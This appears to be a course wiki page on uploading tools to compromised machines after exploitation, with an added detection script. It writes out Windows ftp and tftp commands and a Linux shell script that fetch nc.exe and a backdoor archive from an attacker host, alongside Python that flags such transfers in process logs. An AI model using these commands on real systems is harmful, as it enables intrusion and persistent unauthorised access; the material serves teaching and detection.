File Transfer Fun - Paiet/SEC-335 GitHub Wiki
File Transfer Fun (Uploading Tools and Files to Compromised Machines)
- After gaining control of a target (e.g. limited shell|root shell), we'll need to...
  - upload some tools that will help us KEEP access and/or make accessing easier later
  - further our control of the target
  - WHY!?!?!?!? (we're root, right?)
    - Machines get patched
- What are good tools for uploading our tools/backdoors?
  - Linux
    - netcat
    - wget
    - curl
    - ftp
    - All usually built-in
  - Windows
    - tftp
      - Already on Windows XP/2003
      - Must be added by user in Windows 7/2008
    - ftp
      - Usually built-in
- Interactive vs. Non-Interactive
  - Interactive tools can be problematic with reverse-shells
  - How to work around?
    - Pre-Setup
      - Install/Start local FTP server on attacker PC
      - Create an FTP user and set password
      - Copy exploitation tools/files to FTP directory
    - Time to upload
      - Gain shell through exploit
      - Move to directory where you want to put exploit tools/files
      - Win32
        - FTP method

          ```
          C:\Windows\System32> echo open 192.168.219.146 21> ftp.txt
          C:\Windows\System32> echo USER ftp2>> ftp.txt
          C:\Windows\System32> echo P@ssw0rd1>> ftp.txt
          C:\Windows\System32> echo bin >> ftp.txt
          C:\Windows\System32> echo GET nc.exe >> ftp.txt
          C:\Windows\System32> echo bye >> ftp.txt
          C:\Windows\System32> ftp -v -n -s:ftp.txt
          ```
        - TFTP method (if we're so lucky :)
          - Make sure your tftp server is running

            ```
            ~$ atftpd --daemon --port 69 /tftp
            ```

            `/tftp` is the dir where you copy your exploit tools

            ```
            C:\Windows\System32> tftp -i 192.168.219.146 get nc.exe
            ```
      - Linux

        ```
        ~$ echo '#!/bin/sh'> ftp.sh
        ~$ echo HOST='192.168.219.146'>> ftp.sh
        ~$ echo USER='ftp2'>> ftp.sh
        ~$ echo 'ftp -v -n $HOST <<END_SCRIPT'>> ftp.sh
        ~$ echo 'user $USER'>> ftp.sh
        ~$ echo 'get backdoor.tar'>> ftp.sh
        ~$ echo 'bye'>> ftp.sh
        ~$ echo 'END_SCRIPT'>> ftp.sh
        ~$ chmod u+x ftp.sh
        ~$ ./ftp.sh
        ```
  - Other methods
    - Powershell-ftp
    - win-vbs-ftp-commands
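On the detection side, the non-interactive `ftp -s:` and `tftp ... get` invocations above stand out in process-creation logs. The following is an added example (not part of the original wiki): it flags those command lines and extracts the server, login and fetched file names from a recovered `ftp -s:` script. The event tuples, the script text and all function names are constructed for illustration.

```python
import re

# Constructed process-creation records (image path, command line), shaped like
# the fields Sysmon Event ID 1 or Security Event 4688 record. Not real telemetry.
EVENTS = [
    (r"C:\Windows\System32\ftp.exe", "ftp -v -n -s:ftp.txt"),
    (r"C:\Windows\System32\tftp.exe", "tftp -i 192.168.219.146 get nc.exe"),
    (r"C:\Windows\System32\ftp.exe", "ftp"),  # interactive session, no script
    (r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]

# Constructed: the script file the page's echo commands would leave on disk.
FTP_SCRIPT = "open 192.168.219.146 21\nUSER ftp2\nP@ssw0rd1\nbin \nGET nc.exe \nbye \n"
SCRIPT_FLAG = re.compile(r"(?:^|\s)-s:(\S+)", re.IGNORECASE)

def classify(image, cmdline):
    """Return (rule, detail) for a scripted ftp/tftp transfer, else None."""
    exe = image.lower().rsplit("\\", 1)[-1]
    m = SCRIPT_FLAG.search(cmdline)
    if exe == "ftp.exe" and m:
        return ("ftp_scripted", m.group(1))  # detail = script file to collect
    tokens = cmdline.split()
    verbs = [t.lower() for t in tokens]
    if exe == "tftp.exe" and "get" in verbs[1:-1]:
        i = verbs.index("get", 1)
        return ("tftp_get", tokens[i - 1] + ":" + tokens[i + 1])  # host:file
    return None

def scan(events):
    """Return (cmdline, rule, detail) for every event that matches a rule."""
    return [(c, *classify(i, c)) for i, c in events if classify(i, c)]

def parse_ftp_script(text):
    """Extract server, login and fetched files from a recovered -s: script."""
    info = {"server": None, "user": None, "files": []}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue  # password line, bin, bye: nothing to extract
        verb = parts[0].lower()
        if verb == "open":
            info["server"] = parts[1]
        elif verb == "user":
            info["user"] = parts[1]
        elif verb in ("get", "recv"):
            info["files"].append(parts[1])
    return info
```

Because `echo` is a `cmd.exe` built-in, building the script file creates no process events of its own; the `ftp.exe` launch with `-s:` is the event to alert on, and the script file it names is the artifact to collect.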